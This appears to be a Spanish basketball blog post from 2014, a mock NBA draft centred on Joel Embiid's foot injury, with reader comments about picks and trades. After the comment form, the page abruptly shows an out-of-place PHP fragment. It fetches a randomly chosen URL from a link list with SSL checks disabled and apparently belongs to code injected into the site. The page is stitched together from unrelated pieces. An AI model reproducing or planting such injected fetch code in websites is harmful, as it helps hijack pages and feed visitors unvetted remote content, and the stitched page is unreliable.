Mock draft 5.0: Edición Hueso Navicular

21 de June de 2014 por Jose_Dantley

embiidLa lesión de Joel Embiid ha trastocado todos los mocks del draft de la NBA. Salvo que hubiera algún médico en esta sala, acabamos de aprender que existe un hueso navicular que suele dar problemas en gigantes de la talla del camerunés. Las últimas noticias hablan de 4 a 6 meses de baja. Sin embargo, no es preocupante el tiempo de baja, sino que la citada lesión no sea más que un indicador de futuros problemas. Yao Ming, Zydrunas Ilgauskas o Bill Walton son parte de la ilustre lista de centers afectados por fracturas -en algunos casos recurrentes- en el hueso navicular. Incluso Michael Jordan tuvo una fractura menor de este tipo. La terrible presión que soportan los huesos del pie en los hombres altos hace que su recuperación sea más lenta y, generalmente, menos segura.

Ante esta situación, la gran pregunta del draft es saber hasta qué pick caerá Embiid. Dando por hecho que Parker y Wiggins serán 1 y 2 en un orden aún por determinar ¿se atreverán los Sixers a draftear nuevamente a un jugador con problemas de lesiones como el año pasado a Nerlens Noel? En nuestro anterior draft ya nos referíamos a problemas de espalda de Embiid. Ahora, lógicamente, las dudas se agrandan, y un claro reflejo de ello son las declaraciones realizadas por uno de los general managers que han de elegir en el Top 10 del draft a un periodista de ESPN en las que reconoce que los médicos de su franquicia le han pedido que ni se le ocurra seleccionar a Embiid.

Por otro lado, los Sixers tendrían difícil su elección. Smart o Exum son bases, aunque con el australiano habría esperanzas de que pudiera ser una estrella jugando de escolta. Coincide que justamente en esa posición está el rookie del año -el peor año, eso sí-, Michael Carter-Williams. Randle o Vonleh en el pick 3 podrían estar demasiado por encima de su posición real en el draft. Nos inclinamos a pensar que si los Sixers van a por potencial preferirán a Exum, pese a las dudas sobre su tiro exterior, e intentarán incluso traspasar a MCW.

Si es así, la pelota quedará en el tejado de los Magic. En teoría quieren un base y tienen asegurado a Exum o Smart. Pero la tentación es grande y teniendo en cuenta que tienen el pick 12, donde pueden draftear a Ennis o Payton, creemos que no dejarán pasar la oportunidad. El riesgo es enorme; el beneficio, también.

La lesión de Embiid afecta al resto de la lotería. Estaremos atentos a posibles noticias, pero serán necesarios algunos días para asimilar las consecuencias del terremoto Embiid.

wiggins1. Cavaliers. Wiggins

Parker es la otra posibilidad si lo consideran con la ambición suficiente como para liderar la ofensiva del equipo.

2. Bucks. Parker

Esta elección permite, además, mantener a Antetokounmpo en su posición natural.

3. Sixers. Exum

Potencial, pero mucha incertidumbre, rodean al australiano. Su tiro exterior está por pulir.

4. Magic. Embiid

Como hemos comentado, es demasiado el beneficio para dejar pasar la oportunidad.

5. Jazz. Smart

Muy difícil elección para Utah. Claramente, Smart, Randle y Vonleh son los mejores jugadores disponibles a priori. Todos ellos ocupan las posiciones en las que los Jazz tienen talento joven. Aun con muchísimas dudas, pueden intentar el experimento de compatibilizar los minutos de Burke con Smart.

6. Celtics. Vonleh

Ainge nos puede sorprender e intentar subir ahora que ha habido una ligera devaluación de los picks altos. Si no es así, Vonleh encaja más con la nueva filosofía Celtic que Randle.

7. Lakers. Randle

Existe una cierta posibilidad de que los Lakers vendan la ronda y acaben con Love en sus filas, o -en un escenario más realista- la intercambien por Klay Thompson (como parte del traspaso de Love a los Warriors). También se especula con un traspaso con los Sixers (Pick 7 y Nash por MCW y Thaddeus Young), pero va a ser complicado. Randle aportaría algo distinto al conjunto angelino y más potencial de ser All-Star que el resto de candidatos aún no drafteados con la posible excepción de Saric y quién sabe si de Lavine.

8. Kings. McDermott

McDermott es la opción más segura y al mismo tiempo más compatible con el roster actual de los Kings.

9. Bobcats. Stauskas

Tirador a un equipo de no tiradores.

aaron gordon10. Sixers. Gordon

Con el puesto de base cubierto, pueden ir a lo seguro. Gordon ofrece garantías de lucha y ambición. Ofensivamente tiene muchísimo que aprender. Saric es otra opción.

11. Nuggets. Lavine

Nuevamente Saric es una alternativa, pero los Nuggets podrían ir a por futuro, aunque sea muy lejano. Lavine es superado atléticamente solo por Wiggins, pero está muy lejos de contribuir.

12. Magic. Saric

Habiendo drafteado riesgo con Embiid, podrían ir a un valor contrastado como profesional. Incluso podrían atreverse a darle galones.

13. Wolves. Harris

Esta elección tiene el riesgo de ser una versión pequeña de Shabazz Muhammad. Anotador, pero con dudas sobre su eficiencia.

14. Suns. Young

En una posición mejorable para los Suns, Young puede ser una opción de futuro, aunque a algún año de poder resultar útil.

Volveremos en pocos días. El draft se acerca y promete emociones.

Comenta

13 comentarios a esta entrada

  1. joder dice:
    #1

    Orlando necesita un base.
    Otra cosa hubiera sido si Embid les llega sin dudas( no es el caso), entonces si, pero yo como Orlando cojo a Smart.
    Los Jazz le cogeran con esas dudas y con todos los 5 que tienen?
    Los Celtics entierran el Love, Alfaro, Asik……y se dedican a la reconstrucion desde 0?

    Si, esta muy interesante

      Citar

  2. Denise dice:
    #2

    Confío en el buen hacer del GM de los Magic y que no se complique la vida drafteando a Embiid, por favor.
    Potencial tiene todo el del mundo, pero entre el pie y la espalda, elegirlo sería malgastar un pick 4 en un equipo como Orlando que necesita reforzar cualquier posición menos la de Center donde ya cuenta con 2 tios de 24 años (Vucevic y O’Quinn), con muchísimo futuro por delante.
    Como digo, elegir al camerunés sería complicarse la vida, asumir un riesgo enorme y comerte la cabeza buscando un traspaso por Vucevic y a ver que recibes a cambio.
    Ojalá les llegue Exum, y si no, draftearía a Vonleh ó Randle. Smart es muy bueno, pero este año ha hecho unos workouts malísimos con Orlando y el año pasado el mamón nos dejo tirados en el pick 2. Que le den.

    Volviendo a lo de Embiid, apostaría a que se lo llevan los Celtics en el pick 6, donde a esa altura ya puedes empezar a asumir un poco de más riesgo.

      Citar

  3. txusma dice:
    #3

    Se confirma que Saric firma por el Efes y que no llegará a la NBA antes de 2 años. Los mocks ya le daban rozando los puestos de lotería pero veremos si no cae un poco más todavía.

      Citar

  4. jhc dice:
    #4

    Buenas si hay algun interesado en jugar ligas fantasy con salarios, tenemos una desde hace 5 años y estamos buscando managers activos

      Citar

  5. Esteban dice:
    #5

    la lesion de embit simplifica las dos primeras elecciones

    con el fuera de carrera, los CAVS no tienen la minima duda que la defensa de wiggins es la ideal al lado del talento ofensvio de waiters e irvinrg

    y los bucks tienen claro que en su pesimo equipo por donde se lo mire, Parker va a ser una estrella que vendera camisetas de a montones

    ahora, caera tan profundo embiid como para llegar a pick de los Lakers?

      Citar

  6. Dantley dice:
    #6

    Lo de Saric veremos a dónde le lleva.

    No está claro parece si Parker o Wiggins según se escucha. Tampoco está claro si incluso Exum pega algún salto más. Y como siempre se está a la espera del posible baile final de picks.

      Citar

  7. Esteban dice:
    #7

    sin dudas LOS Cavs debe jugarsela con WIGGINS salga pato o gallareta, un anotador que necesita la bola y mucho potragonismo ya tienen a Irving y Waiters, con Parker ya seria demasiado, Wiggins podria darle un rol al menos por ahora, mas secundario y de aspecto defensivo que podria cuajar mejor en ellos

    mientras Parker encajaria mucho mejor en los Bucks necesitado de tiros que Wiggins

    la cosa deberian estar muy claras a mi entender

      Citar

  8. Denise dice:
    #8

    Esteban:
    sin dudas LOS Cavs debe jugarsela con WIGGINS salga pato o gallareta, un anotador que necesita la bola y mucho potragonismo ya tienen a Irving y Waiters, con Parker ya seria demasiado, Wiggins podria darle un rol al menos por ahora, mas secundario y de aspecto defensivo que podria cuajar mejor en ellos

    mientras Parker encajaria mucho mejor en los Bucks necesitado de tiros que Wiggins

    la cosa deberian estar muy claras a mi entender

    Pues fijate que yo veo a los Cavs traspasando el pick 1. El sueño humedo de Gilbert es darle el pick 1 a Minny a cambio de Kevin Love y luego fichar a Lebron James en la agencia libre, pero K. Love si Lebron no vuelve a Cleveland, no querría renovar por Cavs.
    En ESPN apuntaban dos interesantes ofertas
    – Jazz ofreciendo por el Pick 5 y Favors a cambio del Pick 1 + morralla para cuadrar.
    – Orlando ofreciendo pick 4, 12 y Afflalo a cambio del Pick 1 ´+ morralla para cuadrar.

    Fuera del Draft…suena Melo por James Harden. No sé que hacen los Rockets, Melo y Howard juntos no me pegan y no creo que Melo pueda poner mas arriba al equipo en la tabla de lo que lo ha puesto Harden.

      Citar

  9. Vader dice:
    #9

    Primer traspaso de aperitivo previo a la noche del draft. Los Mavs recuperan a Tyson Chandler, acompañado del pistolero Felton (en Texas se sentirá como en casa) a cambio de; Dalembert, Calderon, Larkin, Ellington y dos segundas rondas de este año (34 y 51).

    Creo que les puede venir bien a los dos el movimiento, Dallas necesitaba un refuerzo en la posición de center y New York en la de base, a parte de un tirador como Ellington y las dos rondas.

    Personalmente, como seguidor de los Knicks, me gusta el traspaso. Creo que la plantilla de los Knicks se queda mejor después del traspaso. A ver que pasa con Melo si renueva, se marcha y muy importante si se marcha libre o via sign and trade… nervios…

    Saludos

      Citar

  10. Esteban dice:
    #10

    Vader:
    Primer traspaso de aperitivo previo a la noche del draft. Los Mavs recuperan a Tyson Chandler, acompañado del pistolero Felton (en Texas se sentirá como en casa) a cambio de; Dalembert, Calderon, Larkin, Ellington y dos segundas rondas de este año (34 y 51).

    Creo que les puede venir bien a los dos el movimiento, Dallas necesitaba un refuerzo en la posición de center y New York en la de base, a parte de un tirador como Ellington y las dos rondas.

    Personalmente, como seguidor de los Knicks, me gusta el traspaso. Creo que la plantilla de los Knicks se queda mejor después del traspaso. A ver que pasa con Melo si renueva, se marcha y muy importante si se marcha libre o via sign and trade… nervios…

    Saludos

    no comparto en absoluto, Chandler quiera o no es uno de los mejores centros de la liga y tiene mucho cartel para convencer a Melo o al menos para intentarlo

    calderon ya ha demostrado su nivel en buenos equipos pero sus años en torotno tamdbien nos ha mostrado lo poco que puede hacer en un equipo malo, y los Knicks hoy son bargnani, dalembert, y quien mas? shumpert?

    los Mavs van a lo seguro, hay agentes libres pero temen volver a quedarse con las manos vacias y teniendo a chandler a tiro no lo dudaron, la tentacion por ir tras pau, melo, lebron y demas era tan grande como la de ir por howard, deron o cp3 y ninguna dio resultado

    un afflalo para los Mavs y convencer a Ellis que puede ser sexto hombre del año y clave en esa funcion y los Mavs estan en la carrera nuevamente

      Citar

  11. Vader dice:
    #11

    @Esteban

    No digo que no sea un buen movimiento para los Mavs, creo que es un buen traspaso para los dos equipos.

    Los Knicks consiguen varias piezas que se adaptan bien a la idea del triangulo ofensivo (buenos tiradores) y sobretodo consiguen mucha más flexibilidad porque cualquiera de los jugadores que han llegado podrian salir tras

      Citar

  12. Vader dice:
    #12

    (Sigo)

    …. Podrian salir traspasados, y más usando los dos rondas adquiridas. Felton ya era imposible traspasarlo sin meterlo en otro traspaso, como así ha sido, y era todo lo contrario a un base tipo para Phil Jackson (mal defensor y mal tirador de 3).

    Veremos como salen los Knicks del mercado pero tened en cuenta que Phil ha dejado clarondos cosas:

    – van a buscar piezas para jugar el triangulo.

    – se quede o no Melo van a intentar formar un equipo competitivo para establecer una cultura ganadora en la franquicia (buena faltable hace). Vamos, todo lo contrario a tanquear.

    Saludos

      Citar

  13. Vader dice:
    #13

    Perdonad los errores ortograficos… Malditos teclados de movil!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>